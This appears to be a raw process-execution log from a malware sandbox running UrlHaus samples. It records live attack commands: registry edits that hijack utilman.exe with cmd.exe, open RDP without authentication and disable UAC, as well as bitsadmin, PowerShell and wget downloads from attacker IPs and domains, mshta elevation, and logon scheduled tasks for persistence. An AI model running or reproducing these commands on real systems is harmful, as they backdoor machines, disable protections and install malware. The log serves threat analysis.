REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1184

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1236

C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1228

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E9A.tmp\3E9B.tmp\3E9C.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40CD.tmp\40CE.tmp\40CF.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 812

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1020

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1048

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe"

C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkYwOUQ0OUEtRDIyNC00NEU1LTk1NjAtQkI5NDQ2MDEyM0QwfSIgdXNlcmlkPSJ7OTQ1MjhCNDgtNDg1RC00NjM3LUEyNDItNjcwQzUzRkUzRjY0fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0ZDQTVGOTA4LTgwMjktNDdCQi1BRjlELUI3RTVEMzA1RTk1MX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjM3MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zNTIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7REIyNEVERDMtOTkyMC01RDVGLUZCQkUtOEU3NDNGNzQ4NkMxfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxMjIzIi8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1968 -ip 1968

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{2F09D49A-D224-44E5-9560-BB94460123D0}"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1556

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Users\Admin\Downloads\UrlHausFiles\boot.exe

"C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E26.tmp\6E27.tmp\6E28.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1968 -ip 1968

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1644

C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1868

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\b.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe

"C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

C:\Users\Admin\Downloads\UrlHausFiles\msf.exe

"C:\Users\Admin\Downloads\UrlHausFiles\msf.exe"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Users\Admin\AppData\Local\palladiums\translucently.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe"

C:\Users\Admin\Downloads\UrlHausFiles\def.exe

"C:\Users\Admin\Downloads\UrlHausFiles\def.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5716 -ip 5716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 700

C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe

"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4748 -ip 4748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 732

C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D30A.tmp\D30B.tmp\D30C.bat C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Users\Admin\AppData\Roaming\Bypass.exe

Bypass.exe

C:\Users\Admin\AppData\Local\Temp\Defender.exe

"C:\Users\Admin\AppData\Local\Temp\Defender.exe" /D

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

"C:\Users\Admin\Downloads\UrlHausFiles\key.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1572

C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe

"C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"

C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp" /SL5="$1501DA,3886989,54272,C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause coder_media_11281

C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe

"C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i

C:\Users\Admin\Downloads\UrlHausFiles\7z.exe

"C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause coder_media_11281

C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\win.exe

"C:\Users\Admin\Downloads\UrlHausFiles\win.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\ONHQNHFT.msi"

